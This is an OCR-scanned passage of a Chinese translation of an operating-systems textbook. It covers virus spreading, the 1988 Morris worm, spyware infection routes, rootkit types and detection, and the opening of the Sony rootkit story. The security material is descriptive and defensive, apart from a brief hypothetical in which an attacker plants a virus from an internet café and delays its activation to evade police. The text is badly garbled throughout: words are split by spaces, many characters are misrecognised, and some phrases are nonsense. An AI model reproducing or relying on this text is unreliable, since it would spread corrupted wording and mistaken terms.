为 了 减少 暴露 ，Virgil 可 能 会 通过 一 个 偏远 城市 的 网 吧 登 录 到 
Iternet 上 。 他 既 可 以 把 病毒 融 到 软盘 上 目 己 打开 ， 也 可 以 在 没有 软磁盘 
驱动 占 的 情况 下 利用 隔壁 女士 的 计算 机 读 取 book.doc 文 件 以 便 打 印 。 一 
旦 文件 到 了 Virgil 的 人 硬盘， 他 就 将 文件 名 改 为 Virus.exe 并 运行 ， 从 而 感 
染 整 个 局 域 网 ， 并 且 让 病毒 在 两 周 后 激活 ， 以 防 警 察 列 出 一 周 内 进出 该 
城市 机 场 的 可 疑 人 员 名 单 。 





男 一 个 方法 是 不 使 用 软盘 驱动 器， 而 通过 远程 FTP 站 点 放置 病毒 。 
或 者 市 一 台 笔 记 本 电脑 连接 在 网 吧 的 Ethenet 或 USB 端 口上 ， 而 网 吧 里 确 
实 有 这 些 服务 设备 供 携 市 笔记 本 电脑 的 游客 每 天 查阅 自己 的 电子 邮件 。 























关于 病毒 还 有 很 多 需要 讨论 的 内 容 ， 尤 其 是 他 们 如 何 隐藏 自己 以 及 
东 毒 软件 如 何 将 之 及 现 。 在 本 章 后 面 讨论 恶意 软件 防护 的 时 候 我 们 会 回 


到 这 个 话题 。 


9.7.3 E 








互联 网 计算 机 发 生 的 第 一 次 大 规模 安全 灾难 是 在 1988 年 的 11 月 2 
日 ， 当 时 Cornell 大 学 毕业 生 Robert Tappan Morris 在 Internet 网 上 发 布 了 一 
种 蠕虫 程序 ， 结 果 导 致 了 全 世界 数 以 干 计 的 大 学 、 企 业 和 政府 实验 室 计 
算 机 的 瘫痪 。 这 也 导致 了 一 直 未 能 平 奶 的 争论 。 我 们 稍 后 将 重点 描述 。 
具体 的 技术 细节 请 参阅 Spafford 的 论文 《1989 版 ， 有 关 这 一 事件 的 警 
方 惊险 描述 请 参见 Hafner 和 Markoff 的 书 (1991 版 〉。 


故事 发 生 在 1988 年 的 某 个 时 候 ， 当 时 Morris 在 Berkeley 大 学 的 UNIX 
系统 里 发 现 了 两 个 bug， 使 他 能 不 经 授权 接触 到 Internet 网 上 所 有 的 计算 
机 。Morris 完 全 通过 自身 努力 ， 写 了 一 个 能 够 自我 复制 的 程序 ， 叫 做 里 
H (worm) 。 蠕 虫 可 以 利用 UNIX 的 bug， 在 数秒 种 内 自我 复制 ， 然 后 
迅速 传染 到 所 有 的 机 器 。Morris 为 此 工作 了 好 几 个 月 ， 并 想方设法 调试 
以 逃避 跟踪 。 











现在 还 不 知道 1988 年 11 月 2 日 的 发 作 是 否 是 一 次 实验 ， 还 是 一 次 真 
正 的 攻击 。 不 管 怎 么 说 ， 病 毒 确实 让 大 多 数 Sun 和 VAX 系 统 在 数 小 时 内 
臣服 。Morris 的 动机 还 不 得 而 知 ， 也 有 可 能 这 是 他 开 的 一 个 高 科技 玩 
笑 ， 但 由 于 编程 上 的 错误 导致 局 面 无 法 控制 。 








从 技术 上 来 说 ， 蠕 虫 包含 了 两 部 分 程序 ， 引 导 程 序 和 蚂 虫 本 喘 。 引 





导 程 序 是 99 行 的 称 为 11.c 的 程序 ， 它 在 被 攻击 的 计算 机 上 编译 并 运行 。 
一 旦 发 作 ， 它 就 在 源 计算 机 与 宿主 机 之 间 建 立 连接 ， 上 传 蠕虫 主体 并 运 
行 。 在 花费 了 一 番 周 折 隐 藏 目 身 后 ， 蠕 虫 会 查看 新 簿 主机 的 路 由 表 看 它 

连接 到 其 他 的 机 器 上 ， 通 过 这 种 方式 蠕虫 把 引导 程序 传播 到 所有 相 
连 的 机 器 。 











蠕虫 在 感染 新 机 器 时 有 三 种 方法 。 方 法 1 是 试图 使 用 rsh 命 令 运行 远 
程 shell 程 序 。 有 些 计算 机 信任 其 他 机 器 ， 人 允许 其 他 机 器 不 经 校 验 就 可 运 
行 rsh 命 令 。 如 果 方 法 一 可 行 ， 远 程 shell 会 上 传 蠕虫 主体 ， 并 从 那里 继续 
感染 新 的 计算 机 。 


方法 2 是 使 用 一 种 在 所 有 系统 上 叫做 finger 的 程序 ， 该 程序 允许 
Internet 上 任何 地 方 的 用 户 通过 键入 





finger name@site 


来 显示 菜 人 的 在 特定 安 六 下 的 个 人 信息 。 这 些 信息 通 第 包括 : 个 人 
姓名 、 登 录 名 、 工 作 和 家 庭 地 址 、 电 话 号 码 、 传 真 号 码 以 及 类 似 的 信 
Bo A REA. 





finger 是 这 样 工作 的 。 在 每 个 站 点 有 一 个 叫做 finger 守 护 进程 的 后 合 
进程 ， 它 一 直 保 持 运行 状态 ， 监 视 并 回答 所 有 来 自 因 特 网 的 查询 。 蠕 虫 
所 做 的 是 调用 finger， 并 用 一 个 精心 编写 的 、 由 536 个 特殊 字 节 组 成 的 字 











和 从 串 作为 参数 。 这 一 长 串 履 盖 了 守护 进程 的 缓冲 和 栈 ， 如 图 9-24c 所 
示 。 这 里 所 利用 的 缺陷 是 守护 进程 没有 检查 出 缓冲 区 和 栈 的 溢出 情形 。 
当 守 护 进程 从 它 原 先 获得 请 求 时 所 在 的 过 程 中 返回 时 ， 它 返回 的 不 是 
main， 而 是 栈 上 536 字 市 中 包含 的 过 程 。 该 过 程 试图 运行 sh。 如 果 成 
功 ， 蠕 虫 就 掌握 了 被 攻击 计算 机 里 运行 的 shell。 











方法 3 是 依靠 在 电子 邮件 系统 里 的 sendmail 程 序 ， 利 用 它 的 bug 人 允许 
蠕虫 及 送 引导 程序 的 备份 并 运行 。 


蠕虫 一 旦 出 现 就 准备 破解 用 户 密 码 。Morris 没 有 在 这 方面 做 大 量 的 
有 关 研 究 。 他 所 做 的 是 问 自己 的 父亲 ， 一 名 美国 国家 安全 局 〈 该 局 是 美 
国政 府 的 密码 破解 机 构 ) 的 安全 专家 ， 要 一 份 Morris Sr. 和 Ken 
Thompson 十 年 前 在 Bell 实 验 室 合 著 的 经 典 论文 (Morris fil 
Thompson,1979) 。 每 个 被 破译 的 密码 允许 蠕虫 登录 到 任何 该 密码 所 有 
者 具有 账号 的 计算 机 上 。 














每 一 次 里 虫 访问 到 新 的 机 器 ， 它 就 查看 是 否 有 其 他 版 本 的 蠕虫 己 经 
存活 。 如 果 有 ， 新 的 版 本 就 退出 ， 但 七 次 中 有 一 次 新 蠕虫 不 会 退出 。 即 
使 系统 管理 员 启 动 了 旧 虹 虫 来 是 并 新 蠕虫 也 是 如 此 ， 这 大 概 是 为 了 给 目 
己 做 宣传 。 结 果 ， 七 次 访问 里 的 一 次 产生 了 太 多 的 蠕虫 ， 导 致 了 所 有 被 
感染 机 器 的 停机 : 它们 被 蠕虫 感染 了 。 如 果 Morris 放 弃 这 一 策略 ， 只 是 
让 新 蠕虫 在 旧 蠕 虫 存 在 的 情况 下 退出 ， 蜂 忠 也 许 就 不 那么 容易 被 发 现 
Ta 


当 Morris 的 一 个 朋友 试图 同 纽 约 时报 记 者 John Markoff 说 明 整 个 事件 
是 个 意外 ， 蠕 虫 是 无 害 的， 作者 也 很 遗憾 等 的 时 候 ，Morris 被 捕 了 。 
Morris 的 朋友 不 经 意 地 流露 出 罪犯 的 登录 名 是 rtm。 把 rtm 转 换 成 用 户 名 
十 分 简单 一 一 Markoff 所 要 做 的 只 是 运行 finger。 第 二 天 ， 故 事 上 了 头条 
新 闻 ， 三 天 后 影响 力 甚至 超过 了 总 统 选举 。 





Morris 被 联邦 法 院 审判 并 证 实 有 罪 。 他 被 判 10 000 美 元 罚款 ， 三 年 
察看 和 400 小 时 的 社区 服务 。 他 的 法 律 费 用 可 能 超过 了 150 000 美 元 。 这 
一 判决 导致 了 大 量 的 争论 。 许 多 计算 机 业界 人 员 认 为 他 是 个 聪明 的 研究 
生 ， 只 不 过 恶作剧 超出 了 控制 。 蜂 虫 程序 里 没有 证 据 表 明 Morris 试 图 偷 
窃 或 毁坏 什么 。 而 其 他 人 认为 Morris 是 个 严重 的 罪犯 必须 蹲 监狱 。 
Morris 后 来 在 哈佛 大 学 获得 了 博士 学 位 ， 现 在 他 是 一 名 麻 省 理工 学 院 的 
教授 。 








这 一 事件 导致 的 永久 结果 是 建立 了 计算 机 应 急 响 应 机 构 Computer 
Emergency Response Team，CERT) ， 这 是 一 个 发 布 病毒 入 侵 报告 的 中 
心机 构 ， 有 多 名 专家 分 析 安 全 问题 并 设计 补丁 程序 。CERT 有 了 自己 的 
下 载 网 站 ，CERT 收 集 有 关 会 受到 攻击 的 系统 缺陷 方面 的 信息 并 告知 如 
何 修复 。 重 要 的 是 ， 它 把 这 类 信息 周期 发 布 给 Internet 上 的 数 以 生计 的 系 
统管 理 员 。 但 是 ， 某 些 别 有 用 心 的 人 《可 能 假装 成 系统 管理 员 ) 也 可 以 
得 到 关于 系统 bug 的 报告 ， 并 在 这 些 bug 修 复 之 前 花费 数 小 时 (或 数 天 ) 
寻找 破门 的 捷径 。 














从 Morris 晴 虫 出 现 开 始 ， 越 来 越 多 种 类 的 蠕虫 病毒 出 现在 网 络 上 。 
这 些 蚂 虫 病毒 的 机 制 与 Morris 一 样 ， 所 不 同 之 处 只 是 利用 系统 中 不 同 软 
件 的 不 同 漏洞 。 由 于 蠕虫 能 够 自我 复制 ， 因 此 扩散 趋势 比 病毒 要 快 。 其 
结果 是 ， 越 来 越 多 的 反 蠕 虫 技术 被 开发 出 来 ， 它 们 大 多 都 试图 在 蠕虫 第 
一 次 出 现 的 时 候 将 其 发 现 ， 而 不 是 在 它们 进入 中 心 数据 库 时 才 实 施 侦 测 
(Portokalidis 和 Bos,2007)。 


9.7.4 间谍 软件 


间 诬 软件 (spyware〉 是 一 种 迅速 扩散 的 恶意 软件 ， 粗 略 地 讲 ， 间 
恋 软 件 是 在 用 户 不 知情 的 情况 下 加 载 到 PC 上 的 ， 并 在 后 台 做 一 些 超出 
用 户 意愿 的 事情 。 但 是 要 定义 它 却 出 乎 意料 的 微妙 。 比 如 Windows 目 动 
更 新 程序 下 载 安全 组 件 到 安装 有 Windows 的 机 器 上 ， 用 户 不 需要 干预 。 
同样 地 ， 很 多 反 病 毒 软件 也 在 后 合 目 动 更 新 。 上 述 的 两 种 情况 都 不 被 认 
为 是 间谍 软件 。 如 果 Potter Stewart 还 健在 的 话 ， 他 也 许 会 说 : “我 不 能 定 
义 间 诬 软 件 ， 但 只 要 我 看 见 它 ， 我 就 知道 。” 





其 他 人 通过 努力 ， 进 一 步 地 尝试 定义 间 诬 软件 。Barwinski 等 人 认为 
它 有 四 个 特征 ， 首先 ， 它 隐藏 目 旱 ， 所 以 用 户 不 能 轻易 地 找到 ; 其 次 ， 
它 收 集 用 户 数据 (如 访问 过 的 网 址 、 口 令 或 信用 卡号 ) ; 再 次 ， 它 将 收 
集 到 的 资料 传 给 远程 的 监控 者 最后， 在 弛 载 它 时 ， 间 谍 软 件 会 试图 进 
行 防御 。 此 外 ， 一 些 间 谍 软 件 改变 设置 或 者 进行 其 他 的 恶意 行为 。 





Barwinski 等 人 将 间谍 软件 分 成 了 三 大 类 。 第 一 类 是 为 了 营销 : 该 类 
软件 只 是 简单 地 收集 信息 并 发送 给 控制 者 ， 以 更 好 地 将 广告 投放 到 特定 
的 计算 机 。 第 二 类 是 为 了 监视 : 某 些 公司 故意 在 职员 的 电脑 上 安 六 间谍 
软件 ， 监 视 他 们 在 做 什么 ， 在 浏览 什么 网 站 。 第 三 类 接近 于 典型 的 恶意 
软件 ， 被 感染 的 电脑 成 为 僵尸 网 络 中 的 一 部 分 ， 等 每 控制 者 的 指令 。 





他 们 做 了 一 个 实验 ， 通 过 访问 5000 个 网 站 看 什么 样 的 网 站 含有 间谍 
软件 。 他 们 发 现 这 些 网 站 和 成 人 娱乐 、 盗 版 软件 、 在 线 旅行 有 关 。 





华盛顿 大 学 做 了 一 个 履 盖 面 更 广 的 调查 〈Moshchuk 等 人 ， 
2006) 。 在 他 们 的 调查 中 ， 约 18 000 000 个 URL 被 感染 ， 并 且 6% 被 发 现 
含有 间谍 软件 。 所 以 AOL/NCSA 所 作 的 调查 就 不 奇怪 了 : 在 接受 调查 的 
家 用 计算 机 中 ，80% 深 受 间谍 软件 的 危害 ， 平 均 每 台 计 算 机 有 93 个 该 类 
软件 。 华 盛 顿 大 学 的 调查 发 现成 人 、 明 星 和 桌面 壁纸 相关 的 网 站 有 最 高 
的 感染 率 ， 但 他 们 没有 调查 旅行 相关 的 网 站 。 


1. 间 诬 软 件 如 何 扩 散 


显然 ， 接 下 来 的 问题 是 :“ 一 台 计 算 机 是 如 何 被 间谍 软件 感染 
的 ? ”一 种 可 能 途径 和 所 有 的 恶意 软件 是 一 样 的 :通过 木马 。 不 少 的 免 
费 软 件 是 包含 有 间谍 软件 的 ， 软 件 的 开发 者 可 能 束 是 通过 间谍 软件 而 获 
利 的 。P2P 文 件 共 享 软件 〈 比 如 Kazaa) 就 是 间谍 软件 的 温床 。 此 外 ， 许 
多 网 站 显示 的 广告 条 幅 直 接 指 向 了 含有 间谍 软件 的 网 页 。 











另 一 种 主要 的 感染 途径 叫做 下 载 驱 动 (drive-by down load) ， 仅 仅 
访问 网 页 就 可 能 感染 间谍 软件 〈 实 际 上 是 恶意 软件 ) 。 执 行 感染 的 技术 
有 三 种 。 首 先 ， 网 页 可 能 将 浏览 器 导向 一 个 可 执行 文件 Cexe) 。 当 浏 
览 器 访问 此 文件 时 ， 会 弹出 一 个 对 话 框 提示 用 户 运行 、 或 保存 该 文件 。 
因为 合法 文件 的 下 载 也 是 一 样 的 机 制 ， 所 以 大 部 分 用 户 直 接点 击 执行 ， 





导致 浏览 右 下 载 并 运行 该 软件 。 然 后 电脑 融和 被 感染 了 ， 间 谍 软 件 可 以 做 
它 想 做 的 任何 事 。 


第 二 种 种 见 的 途径 是 被 感染 的 工具 条 。 耻 和 Firefox 这 两 种 浏览 器 都 
文 持 第 三 方 工具 条 。 一 些 间谍 软件 的 作者 创建 很 好 看 的 功能 也 不 错 的 工 
具 条 ， 然 后 广泛 地 宣传 。 用 户 一 旦 安装 了 这 样 的 工具 条 也 束 被 感染 了 ， 
比如 ， 流 行 的 Alexa 工 具 条 就 舍 有 间谍 软件 。 从 本 质 上 讲 ， 这 种 感染 机 
制 很 像 木 马 ， 只 是 包装 不 同 。 








第 三 种 感染 的 途径 更 猜 猎 。 很 多 网 页 都 使 用 一 种 微软 的 技术 ， 叫 做 
ActiveX 控 件 。 这 些 控件 是 在 浏览 圳 中 运行 并 扩展 其 功能 的 二 进 制 代 
码 。 例 如 ， 显 示 茶 种 特定 的 图 片 、 音 频 或 视频 网 页 。 从 原则 上 讲 ， 这 些 
技术 非常 合法 。 实 际 上 它 非 常 的 危险 ， 并 可 能 是 间谍 软件 感染 的 主要 途 
径 。 这 项 技术 主要 针对 琅 ， 很 少 针 对 Firefox 或 其 他 类 型 的 浏 贤 屁 。 





当 访 问 一 个 含有 ActiveX 控 件 的 网 页 时 ， 发 生 什 么 情况 取决 于 正 的 
安全 性 设置 。 如 条 安全 性 设置 太 低 ， 间 恋 软 件 就 目 动 下 载 并 执行 了 。 安 
全 性 设置 低 的 原因 是 如 果 设 置 太 高 ， 许 多 的 网 页 就 无 法 正常 显示 《或 根 
本 无 法 显示 ) ， 或 者 下 会 一 直 进 行 提示 ， 而 用 户 并 不 清楚 这 些 提 示 的 作 
用 。 

















现在 我 们 假设 用 户 有 很 高 的 安全 性 设置 。 当 访问 一 个 被 感染 的 网 页 
时 ， 下 检测 到 有 ActiveX 控 件 ， 然 后 弹出 一 个 对 话 框 ， 包 含有 网 页 内 容 





提示 ， 比 如 : 


你 希望 安装 并 运行 一 个 能 加 速 网 页 访问 的 程序 吗 ? 





大 多 数 人 认为 很 不 错 ， 然 后 点 “是 ”。 好 吧 ， 这 是 过 去 的 事情 。 聪 明 
的 用 户 可 能 会 检查 对 话 框 其 他 的 内 容 ， 还 有 其 他 两 项 。 一 个 是 指 问 从 来 
没有 听 说 过 的 ， 也 没有 包含 任何 有 用 信息 的 认证 中 心 的 链接 ， 这 其 实 只 
表明 该 认证 中 心 只 担保 这 家 网 站 的 存在 ， 并 有 足够 的 钱 文 付 认证 的 费 
用 。ActiveX 控 件 实 际 上 可 以 做 任何 事情 ， 所 以 它 非常 强大 ， 并 且 可 能 
让 用 户 很 头疼 。 由 于 虚假 的 提示 信息 ， 即 使 聪明 的 用 户 也 第 第 选 
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载 间 谍 软 件 。 不 过 没有 可 利用 的 pug， 就 会 一 次 次 试图 下 载 该 控件 ， 一 
次 次 的 弹出 同样 的 对 话 框 。 此 时 ， 大 多 数 人 不 知道 该 怎么 办 《打开 任务 
管理 器 ， 订 掉 焉 的 进程 ) ， 所 以 他 们 最 终 放弃 并 选择 “是 ”。 


通 肖 情况 下 ， 下 一 步 是 间谍 软件 显示 20 一 30 页 用 陌生 的 语言 撰写 的 
许可 和 凭 证。 一 有 旦 用 户 接受 了 许可 和 凭证， 他 就 丧失 了 起 诉 间谍 软件 作者 的 
机 会 ， 因 为 他 同意 了 该 软件 的 运行 ， 即 使 有 时 候 当 地 的 法 律 并 不 认可 这 
样 的 许可 凭证 《如 采 许 可 凭证 上 次 “本 凭证 坚定 地 授予 凭证 发 放 者 杀害 
凭证 接受 者 的 母 杀 ， 并 继承 其 遗产 的 权利 ”， 和 凭证 发 放 者 依然 很 难说 服 
EVE) 。 


2. 间 谍 软 件 的 行为 

现在 让 我 们 看 看 间谍 软件 的 常见 行为 : 
更 改 浏览 器 主页 。 
-修改 浏览 器 收藏 页 。 

-在 浏览 器 中 增加 新 的 工具 条 。 

更 改 用 户 默认 的 媒体 播放 器 。 

更 改 用 户 默 认 的 搜索 引擎 。 

.在 Windows 桌 面 上 增加 新 的 图 标 。 
:将 网 页 上 的 广告 条 蔡 换 成 间谍 软件 期 望 的 样子 。 
.在 标准 的 Windows 对 话 框 中 增加 广告 。 
:不 停 地 产生 广告 。 


最 前 面 的 三 条 改变 了 浏览 器 的 行为 ， 即 使 重启 操作 系统 也 不 能 恢复 
以 前 的 设置 。 这 种 攻击 叫做 支持 浏览 旨 (brower hijacking) 。 接 下 来 的 
两 条 修改 了 Windows 注 册 表 的 设置 ， 把 用 户 引 向 了 另外 的 媒体 播放 器 
(播放 间 诬 软件 所 期 望 的 广告 ，》 和 搜索 引擎 (返回 间谍 软件 所 期 望 的 网 
页 ) 。 在 昌 面 上 添加 图 标 显然 是 希望 用 户 运行 新 安装 的 程序 。 替 换 网 页 


广告 条 “468x60.gif 图 像 》 就 像 所 有 被 访问 过 网 页 一 样 ， 为 间 诬 软件 指 
定 的 网 页 打 广 告 。 最 后 一 项 是 最 麻烦 的 :一 个 可 关闭 的 三 告 立刻 产生 为 
一 个 弹出 广告 ， 以 致 无 法 结束 。 此 外 ， 间 诬 软 件 党 第 天 闭 防火 墙 、 弛 载 
其 他 的 间谍 软件 ， 并 可 能 导致 其 他 的 恶意 行为 。 





许多 间谍 软件 有 他 载 程序 ， 当 这 些 卸 载 程序 几乎 不 能 用 ， 所 以 经 验 
不 足 的 用 户 没有 办 法 外 载 。 笠 运 的 是 ， 一 个 新 的 反 间 谍 软 件 产业 已 经 兴 
起 ， 现 有 的 反 病 毒 厂 丙 跃跃欲试 。 





间谍 软件 不 应 该 和 广告 软件 Cadware) 混淆 起 来 ， 合 法 的 软件 生产 
商 提供 了 两 种 软件 版 本 : 一 个 含有 广告 的 免费 版 本 和 一 个 不 含 广 告 的 付 
费 版 本 。 软 件 生 产 商 的 这 种 办 法 非常 耶 明 ， 用 户 为 了 不 受 广 告 的 烦 扰 ， 
而 不 得 不 升级 到 付费 版 本 。 


9.7.5 rootkit 


rootkit 是 一 个 程序 或 一 些 程序 和 文件 的 集合 ， 它 试图 隐藏 其 自身 的 
存在 ， 即 使 被 感染 主机 的 拥有 者 已 经 决定 对 其 进行 定位 和 删除 。 在 通常 
情况 下 ，rootkit 包 含 一 些 同样 具有 隐藏 性 的 恶意 软件 。rootkit 可 以 用 我 
们 目前 讨论 过 的 任 一 方法 进行 安装 ， 包 括 病毒 、 蠕 虫 和 间 恋 软件 ， 也 可 
以 通过 其 他 方法 进行 安装 。 我 们 将 稍 后 讨论 其 中 的 一 种 。 


1.rootkit 的 类 型 


我 们 讨论 目前 可 能 的 五 种 rootkit。 根 据 “rootkit 在 哪里 隐藏 自己 ”， 
我 们 自 底 向 上 将 rootkit 分 为 如 下 几 类 : 


1) 固 件 rootkit。 人 至 少 从 理论 上 讲 ， 一 个 rootkit 可 以 通过 更 新 BIOS 来 
隐藏 自己 在 BIOS 中 。 只 要 主机 被 引导 局 动 或 者 一 个 BIOS 函 数 被 调用 ， 
这 种 rootkit 就 可 以 获得 控制 。 如 果 rootkit 在 每 次 使 用 后 对 自己 加 密 而 在 
每 次 使 用 前 对 上 自己 解密 ， 它 就 很 难 被 发 现 。 这 种 rootkit 在 现实 环境 下 还 
没有 发 现 。 











2) 管 理 程序 rootkit。 这 是 一 种 尤其 插 如 的 rootkit， 它 可 以 在 一 个 由 自 
己 控制 的 虚拟 机 中 运行 整个 操作 系统 和 所 有 应 用 程序 。 第 一 个 概念 证 
明 “ 蓝 药丸 ”(blue pil， 取 自 电影 《黑客 帝国 》) 在 2006 年 被 波兰 黑客 





Joanna Rutkowska 提 出 。 这 种 rootkit 通 常 更 改 引 导 顺 序 以 便 它 能 在 主机 启 
动 时 在 裸 机 下 执行 管理 程序 ， 这 个 管理 程序 会 在 一 个 虚拟 机 中 局 动 操 作 
系统 和 所 有 应 用 程序 。 与 前 一 种 方法 类 似 ， 这 种 方法 的 优点 在 于 没有 任 
何 东西 隐藏 在 操作 系统 、 库 或 者 程序 中 ， 因 此 检查 这 些 地 方 的 rootkit 检 
测 程序 就 显得 不 足 。 











3) 内 核 rootkit。 目 前 最 常见 的 rootkit 感 染 操作 系统 并 作为 驱动 程序 或 
可 引导 内 核 模块 隐藏 于 其 中 。 这 种 rootkit 可 以 轻松 地 将 一 个 大 而 复杂 且 
频繁 变化 的 驱动 程序 替换 为 一 个 新 的 驱动 程序 ， 这 个 新 的 驱动 程序 既 包 

含 原 驱动 程序 义 包 含 rootkit。 

















4) 库 rootkit。 男 一 个 rootkit 可 以 隐藏 的 地 方 是 系统 库 ， 如 Linux 中 的 
libc。 这 种 位 置 给 恶意 软件 提供 了 机 会 去 检查 系统 调用 的 参数 和 返回 
值 ， 并 根据 自身 隐藏 的 需要 更 改 这 些 参数 和 返回 值 。 














5) 应 用 程序 rootkit。 男 一 个 隐藏 rootkit 的 地 方 是 在 大 的 应 用 程序 中 ， 
尤其 是 那些 在 运行 时 会 创建 很 多 新 文件 的 应 用 程序 中 《如 用 户 分 布 图 、 
图 像 预 览 等 ) 。 这 些 新 文件 是 隐藏 rootkit 的 好 地 方 ， 没 有 人 会 怀疑 其 存 
在 。 


这 五 种 rootkit 可 以 隐藏 的 位 置 由 图 9-30 所 示 。 
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图 9-30 tootkit 可 以 隐藏 的 五 种 位 置 
2.rootkit 检 测 


当 硬 件 、 操 作 系 统 、 库 和 应 用 程序 不 能 被 信任 时 ，rootkit 很 难 被 检 
测 到 。 例 如 ， 一 种 查找 rootkit 的 明显 方法 是 列举 磁盘 上 的 所 有 文件 ， 但 
是 读 取 目 录 的 系统 调用 、 调 用 系统 调用 的 库 函 数 以 及 列表 程序 都 有 潜在 





的 恶意 性 ， 并 有 可 能 忽略 掉 与 rootkit 相 关 的 文件 。 然 而 情况 也 绝 非 无 可 
救 药 。 


检测 一 个 引导 目 己 的 管理 程序 并 在 其 控制 下 的 虚拟 机 中 运行 操作 系 
统 和 应 用 程序 的 rootkit 虽 然 难以 处 理 但 也 并 非 不 可 能 。 这 要 求 从 性 能 和 
功能 上 仔细 检查 虚拟 机 和 实际 机 器 的 细微 差异 。Garfinkel 等 (2007) 已 
经 提出 了 一 些 这 样 的 差异 (如 下 所 述 ) ，Carpenter 等 《2007〉 也 讨论 了 


这 个 话题 。 


一 类 检测 方法 依赖 于 一 个 事实 : 管理 程序 自身 使 用 物理 资源 而 失去 
这 些 资源 可 以 被 检测 到 。 例 如 ， 管 理 程序 需要 使 用 一 些 TLB 入 口 ， 在 这 
些 稀缺 资源 的 使 用 上 与 虚拟 机 产生 竞争 。rootkit 检 测 程序 可 以 同 TLB 施 
加 压力 ， 观 察 其 性 能 并 与 此 前 在 裸 机 上 测量 的 性 能 数据 进行 比较 。 





妨 一 类 检测 方法 与 计时 相关 ， 尤 其 与 虚拟 输入 输出 设备 的 计时 相 
关 。 假 设 在 实际 机 器 上 读 出 一 些 PCI 设 备 寄存 器 需要 100 个 时 钟 周 期 ， 这 
个 时 间 很 容易 重 现 。 在 一 个 虚拟 环境 下 ， 这 个 寄存 器 的 值 来 目 于 内存 ， 
它 的 读 取 时 间 依 赖 于 它 到 底 在 CPU 一 级 缓存 、 二 级 缓存 还 是 实际 RAM 
中 。 检 测 程序 可 以 轻易 地 强迫 其 在 这 些 状 态 之 间 来 回 移 动 并 汕 量 实际 读 
取 时 间 的 变化 。 注 意 我 们 关注 的 是 读 取 时 间 的 变化 而 非 实际 的 读 取 时 
间 。 














为 一 个 可 以 被 探查 的 部 分 是 执行 特权 指令 的 时 间 ， 尤 其 是 对 那些 在 
实际 人 硬件 上 只 需要 几 个 时 钟 周期 而 在 被 模 拟 时 需要 几 百 或 儿 干 个 时 钟 周 
期 的 特权 指令 。 例 如 ， 如 果 读 出 系 个 被 保护 的 CPU 寄 存 咒 在 实际 硬件 环 
境 下 需要 1 纳 秒 ， 那 么 10 亿 次 软 中 断 和 模拟 绝 不 可 能 在 1 秒 内 完成 。 妆 
然 ， 管 理 程 序 可 以 欺骗 报告 模拟 时 间 而 不 报告 所 有 涉及 时 间 的 系统 调用 
的 实际 时 间 ， 检 测 程序 可 以 通过 连接 提供 精确 时 间 基 准 的 远程 主机 或 网 
站 来 经 过 时 间 模 拟 。 因 为 检测 程序 只 需要 测量 时 间 间 隔 〈 例 如 ， 执 行 10 
亿 次 被 保护 寄存 器 的 读 操 作 需 要 多 少时 间 ) ， 本 地 时 钟 和 远程 时 钟 的 偏 
移 没 有 关系 。 








如 果 没 有 管理 程序 极 竖 入 硬件 和 操作 系统 之 间 ， 那 么 rootkit 可 能 被 
隐藏 在 操作 系统 中 。 很 难 通 过 引导 计算 机 来 检测 其 存在 ， 因 为 操作 系统 
古 不 可 信 的 。 例 如 ，rootkit 可 能 安装 大 量 的 文件 ， 这 些 文件 的 文件 名 都 
由 “$$4$ “起 始 ， 当 读 取 代表 用 户 程序 的 目录 时 ， 不 报告 这 些 文件 的 存 
在 。 





在 这 样 的 环境 下 检测 rootkit 的 一 个 方法 是 从 一 个 可 信 的 外 部 介质 
《如 CD-ROMDVD 或 USB 棒 ) 引导 计算 机 ， 然 后 磁盘 可 以 被 一 个 反 
rootkit 程 序 扫描 ， 这 时 不 用 担心 rootkit 会 干扰 这 个 扫描 。 另 一 个 选择 是 
对 操作 系统 中 的 每 个 文件 做 密码 散 列 ， 这 些 散 列 值 可 以 与 一 个 列表 中 的 
散 列 值 进行 比较 ， 这 个 列表 在 系统 安装 的 时 候 生 成 并 存储 于 系统 外 的 一 
个 不 可 被 算 改 的 位 置 。 如 果 没 有 预先 建立 这 些 散 列 值 ， 也 可 以 由 安装 
CD-ROM 或 DVD 即时 计算 得 到 ， 或 由 被 比较 文件 自身 进行 计算 得 到 。 








库 和 应 用 程序 中 的 rootkit 更 难 隐藏 ， 当 操作 系统 从 一 个 外 部 介质 装 
入 并 可 信 时 ， 这 些 库 和 应 用 程序 的 散 列 值 也 可 以 与 已 知 为 正确 且 存 储 与 
CD-ROM 上 的 散 列 值 进行 比较 。 


到 目前 为 止 ， 我们 讨论 的 都 是 被 动 rootkit， 它 们 不 会 干扰 检测 软 
件 。 还 存在 一 些 主动 rootkit， 它 们 查找 并 破坏 检测 软件 或 至 少将 检测 软 
件 更 改 为 永远 报告 “NO ROOTKITS FOUND!”( 没 有 发 现 rootkit) ， 这 
些 rootkit 要 求 更 复杂 的 检测 方法 。 幸 运 的 是 ， 到 目前 为 止 在 现实 环境 下 
主动 rootkit 还 没有 出 现 。 





在 发 现 rootkit 后 应 该 做 什么 这 个 问题 上 存在 两 种 观点 。 一 种 观点 认 
为 系统 管理 员 应 该 像 处 理 剖 症 的 外 科 医生 那 样 非 常 小 心地 切除 它 。 另 一 
种 观点 认为 答 试 移 除 rootkit 太 过 和 危险， 可 能 还 有 其 他 碎片 隐藏 在 其 他 地 
方 ， 在 这 一 观点 下 ， 惟 一 的 解决 办 法 是 回复 到 上 一 个 已 知 干 净 的 完整 备 
份 。 如 果 没 有 可 用 的 备份 ， 束 要 求 从 原始 CD-ROMDVD 进 行 新 的 安 
装 。 





3.Sony rootKit 


在 2005 年 ，Sony BMG 公 司 发 行 了 一 些 包含 rootkit 的 音乐 CD。 这 被 
Mark Russinovich (Windows 管 理工 具 网 站 www.sysinternals.com 的 共同 
创始 人 之 一 ) 发 现 ， 那 时 他 正在 开发 一 个 rootkit 检 测 工具 并 惊奇 地 在 自 
己 的 系统 中 找到 了 一 个 rootkit。 他 在 自己 的 blog 中 写 下 了 这 件 事 ， 这 很 
快 传 遍 了 各 大 媒体 和 互联 网 。 一 些 科 技 论文 与 此 相关 (Amab 和 
Hutchison,2006;Bishop 和 Frincke,2006;Felten 和 Halderman,2006;Halderman 
和 Felten,2006;Levine et al.,2006) 。 这 件 事 导致 的 艇 动 直到 好 几 年 以 后 
才 逐 渐 停 止 。 以 下 我 们 对 此 事件 做 简单 的 描述 。 








当 用 户 插入 CD 到 一 个 Windows 系 统计 算 机 的 驳 动 器 中 时 ，Windows 
查找 一 个 名 为 autorun.inf 的 文件 ， 其 中 包含 了 一 系列 要 执行 的 动作 ， 通 
常 包括 打开 一 些 CD 上 的 程序 (如 安装 向 导 ) 。 正 常情 况 下 ， 音 乐 CD 没 
